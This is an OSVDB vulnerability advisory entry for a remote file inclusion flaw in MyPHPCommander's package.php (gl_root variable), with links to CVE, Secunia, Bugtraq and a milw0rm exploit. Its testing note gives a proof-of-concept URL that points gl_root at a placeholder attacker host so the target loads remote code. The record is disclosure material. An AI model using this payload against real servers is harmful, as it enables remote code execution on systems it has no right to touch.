MyPHPCommander package.php gl_root Variable Remote File Inclusion

2007-01-26T04:18:57
ID OSVDB:32055
Type osvdb
Reporter OSVDB
Modified 2007-01-26T04:18:57

Description

Manual Testing Notes

http://[target]/myphpcommander_path/system/lib/package.php?gl_root=http://[attacker]/soft.txt?cmd

References:

Secunia Advisory ID:23890 Other Advisory URL: http://milw0rm.com/exploits/3201 ISS X-Force ID: 31906 FrSIRT Advisory: ADV-2007-0385 CVE-2007-0568 Bugtraq ID: 22257